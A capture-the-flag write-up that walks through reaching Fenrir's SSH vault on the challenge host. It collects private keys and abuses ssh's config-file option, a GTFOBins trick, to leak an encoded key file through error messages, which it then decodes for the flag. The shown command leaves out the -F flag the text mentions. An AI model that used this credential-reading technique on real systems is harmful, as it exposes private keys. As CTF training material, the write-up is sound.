This is a continuation of No command Here - Part 1, we will be using the same private key and domain from that challenge.

Challenge Description

Danish (original)

Din indsats med at aflure Loke’s tankeboks har været værdsat. Der er dog tegn på at denne tankeboks indeholder mere end bare Loke’s tanker. Han og Fenris har historisk været meget tætte, så vi er overbeviste om at Loke havde bare lidt adgang til Fenris egen tankeboks.

Vi regner med dig.

English (from chatgpt)

Your effort in deciphering Loki’s thought box has been appreciated. However, there are signs that this thought box contains more than just Loki’s thoughts. He and Fenrir have historically been very close, so we are convinced that Loki had at least some access to Fenrir’s own thought box.

We are counting on you.

Solution

Using the ls and cat utils from Part 1 we find and export five private keys:

bash$ ls .ssh
-bash: .ssh/authorized_keys: Permission denied
-bash: .ssh/fenrir.echo.priv: Permission denied
-bash: .ssh/fenrir.id.priv: Permission denied
-bash: .ssh/fenrir.ls.priv: Permission denied
-bash: .ssh/fenrir.pwd.priv: Permission denied
-bash: .ssh/fenrir.ssh.priv: Permission denied

Using fenrir.ls.priv we can list fenrir’s files:

$ ssh -p 2222 -i fenrir.ls.priv fenrir@jættenettet.dk
Contemplations.txt
Connection to jættenettet.dk closed.

$ ssh -p 2222 -i fenrir.ls.priv fenrir@jættenettet.dk .ssh
authorized_keys
vaultkey.encrypted
Connection to jættenettet.dk closed.

While trying to find a way to read vaultkey.encrypted I fell over this error:

$ ssh -p 2222 -i fenrir.ssh.priv fenrir@jættenettet.dk
Can't open user config file : No such file or directory
Connection to jættenettet.dk closed.

Looking at the ssh manpage and searching for user config, I found the -F flag, and looking at GTFOBins, we may be able to read files with it:

$ ssh -p 2222 -i fenrir.ssh.priv fenrir@jættenettet.dk .ssh/vaultkey.encrypted localhost
.ssh/vaultkey.encrypted line 1: no argument after keyword "fuws2ljnijcuoskoebhvarkoknjuqicqkjevmqkuiuqewrkzfuws2ljnbjrdgqtmmjxe46tbimyx"
[expunged for readability]
.ssh/vaultkey.encrypted: line 55: Bad configuration option: hu6quljnfuws2rkoiqqe6ucfjzjvgsbakbjesvsbkrcsas2flews2ljnfufa
.ssh/vaultkey.encrypted: terminating, 55 bad configuration options
Connection to jættenettet.dk closed.

Since vaultkey.encrypted only contains lowercase letters (a-z) and the numbers 2 to 7, it is properly not base64 encoded, but instead base32 (26 letters and 6 numbers). So decoding vaultkey.encrypted from base32 we get another private ssh key:

Using this key we get the flag:

$ ssh -p 2222 -i vaultkey.priv vault@jættenettet.dk
FDCA{S5H_B3_M4de_Quit3_Str1ct}
Connection to jættenettet.dk closed.